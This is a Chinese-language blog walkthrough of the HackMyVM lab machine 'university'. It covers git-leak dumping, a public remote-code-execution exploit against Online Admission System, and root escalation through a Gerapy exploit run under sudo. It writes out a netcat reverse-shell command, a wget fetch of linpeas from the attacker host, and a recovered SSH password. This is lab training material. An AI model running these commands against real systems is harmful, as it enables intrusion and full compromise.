freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

记一次hackmyvm综合靶场的渗透测试-university

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记一次hackmyvm综合靶场的渗透测试-university
知非 2022-04-27 09:13:17 114567
所属地 黑龙江省

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!


KALI攻击机:192.168.1.128

靶机:未知

目标:root.txt和user.txt

信息收集阶段

nmap -sn 192.168.1.0/24

1651021590_6268971684fc65034188a.png!small?1651021591206

nmap -A -p1-65535 192.168.1.28

1651021595_6268971b9a42fea9eb196.png!small?1651021596060

开启了22端口和80端口:并且可见80端口下有.git文件,存在git泄露!

同时可见当前系统为:https://github.com/rskoolrash/Online-Admission-System

漏洞利用阶段

先从git泄露找找有没有可用的地方!!

首先需要安装git:apt-get install git

这里采用工具:GitHack

下载链接如下:

https://github.com/BugScanTeam/GitHack

python2 GitHack.py http://192.168.1.28/.git/

Clone Success. Dist File : /root/dist/192.168.1.28

1651021643_6268974bbf1de9d7320b0.png!small?1651021644408

翻了半天,没找到啥可利用的!

看下这个系统!有没有漏洞!

1651021650_6268975257e9d28bae33d.png!small?1651021650707

上网搜下!

https://packetstormsecurity.com/files/165453/Online-Admission-System-1.0-Remote-Code-Execution.html

这里有个Online-Admission-System 1.0系统的RCE漏洞,但是我们不知道这个系统是否是1.0版本!

试下:python3 oas10-exec.py -t 192.168.1.28 -p 80 -L 192.168.1.128 -P 4444

1651021661_6268975d31fcecd104656.png!small?1651021661654

修改为交互式的shell!

python3 -c 'import pty; pty.spawn("/bin/bash")'

我们看到还有两个用户,看来需要切换到这两个用户!

1651021681_6268977171ae9e279e80f.png!small?1651021681876

这个shell有问题,不知道是超时还是怎么回事!总是会自动掉线!

1651021692_6268977c8cf4795ef4036.png!small?1651021692949

我们把这个shell反弹出去!

nc 192.168.1.128 5555 -e /bin/bash

1651021702_62689786363ca78c0752f.png!small?1651021702593

切换为交互式shell!!!

python3 -c 'import pty; pty.spawn("/bin/bash")'

这里直接下载提权脚本信息收集linpeas.sh来检查!

wget http://192.168.1.128:8000/linpeas.sh

1651021708_6268978c0c52ef8b5da8b.png!small?1651021708512

没发现啥可用的!手动找下吧!

这个目录下有sandra的密码信息!

1651021715_6268979332b13bbfa8206.png!small?1651021715673

用ssh连接下试试!

ssh sandra@192.168.1.28

密码:Myyogaiseasy

1651021721_626897991fd1a17897ff7.png!small?1651021721779

1651021726_6268979e61fc910562f2f.png!small?1651021726784

第一个flag:

cat user.txt

HMV0*********5HMV

权限提升阶段

接着就是需要提权到root!

sudo权限查询下!

1651021752_626897b8d3167385171ef.png!small?1651021753289

我们上网搜下,看看这个程序gerapy是干啥用的?!

Gerapy 是一款分布式爬虫管理框架,支持 Python 3,基于 Scrapy、Scrapyd、Scrapyd-Client、Scrapy-Redis、Scrapyd-API、Scrapy-Splash、Jinjia2、Django、Vue.js 开发。

找了下:searchsploit Gerapy 确实有远程代码执行漏洞,而且需要在认证状态下!

1651021759_626897bf5e35deceb4aa1.png!small?1651021759766

find / -name 50640.py -print,在这!

1651021764_626897c47b12a4fcb17ee.png!small?1651021764911

出错了!这个是认证状态下,我们看下脚本中的内容!

1651021769_626897c99dbfea9979778.png!small?1651021770074

1651021773_626897cde8c447dbfebe0.png!small?1651021774307

参考:https://github.com/Gerapy/Gerapy的内容,需要对其进行初始化!

sudo gerapy init

cd gerapy

sudo gerapy migrate

1651021808_626897f0a368e3d381f31.png!small?1651021809463

sudo gerapy createsuperuser

1651021813_626897f5c7a04bcda4dbc.png!small?1651021814289

这里用用户名admin和密码admin,脚本就不需要修改了!

sudo gerapy runserver 0.0.0.0:8888

看下面的官方注释!

1651021820_626897fcc7a61106350e5.png!small?1651021821236

1651021825_62689801178881d1726bd.png!small?1651021825498

python3 /usr/share/exploitdb/exploits/python/remote/50640.py -t 192.168.1.28 -p 8888 -L 192.168.1.128 -P 6666

有报错,能踩的坑全踩全了!

1651021829_62689805e08626ae2cfb9.png!small?1651021830386

我们在获取project list时报错了!所以我们切换到projects文件夹中进行初始化!

1651021835_6268980b23adfac4038f7.png!small?1651021835562

继续在8888端口上开启服务!

1651021840_62689810147996cfc0a6b.png!small?1651021840544

python3 /usr/share/exploitdb/exploits/python/remote/50640.py -t 192.168.1.28 -p 8888 -L 192.168.1.128 -P 6666

1651021845_626898155f6906d9615a6.png!small?1651021845831

最后的flag:

cat root.txt

HMV***************HMV


# 渗透测试 # web安全 # 网络安全技术 # 靶场平台 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 知非 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
hackmyvm靶场实战
相关推荐
网络安全专业术语英文缩写对照表 原创
网络安全专业术语英文缩写对照表

网络安全

因在阅读文献过程中经常遇到各种专业缩写,所以把各种缩写总结了一下。

李逍遥g

327357围观  · 3收藏  · 5喜欢 2022-04-28

KnownDll Herpaderping实现无文件进程注入
KnownDll Herpaderping实现无文件进程注入

网络安全

本文是对 Windows Process Injection: KnownDlls Cache Poisoning的整理学习,并与Herpa...

绿盟科技

204808围观 2022-04-28

浅析文件包含
浅析文件包含

Web安全

近期发现文件包含这方面几乎一窍不通,特来对此漏洞进行学习,并总结如下,希望能对正在学习文件包含的人有些许帮助。

quan9i

138755围观  · 3收藏  · 48喜欢 2022-04-28

乌特拉安全实验室丨记录一次从弱口令到sql注入拿shell
乌特拉安全实验室丨记录一次从弱口令到sql注入拿shell

漏洞

有段时间一直在挖 edu,挖到一个从普通用户权限到 getshell 的站,觉得挺有意义的,记录了一下,也学到了挺多知识的,但中间也出现了些...

FreeBuf_377712

189184围观 2022-05-10

Advantech WebAccess 8.1-认证收集漏洞:CVE-2016-5810复现
Advantech WebAccess 8.1-认证收集漏洞:CVE-2016-5810复现

漏洞

Advantech WebAccess是中国台湾研华(Advantech)公司的一套基于浏览器架构的HMI/SCADA软件,该软件支持动态图...

安帝Andisec

156812围观 2022-04-28

知非 LV.8
这家伙太懒了,还未填写个人描述!
  • 125 文章数
  • 40 关注者
一个月学习通过商用密码测评师的经验分享
2025-01-09
等保2.0之AIX安全计算环境测评指导书
2023-05-10
记一次hackmyvm综合靶场的渗透测试-warez
2022-04-27
文章目录
前言
    信息收集阶段
      漏洞利用阶段
        权限提升阶段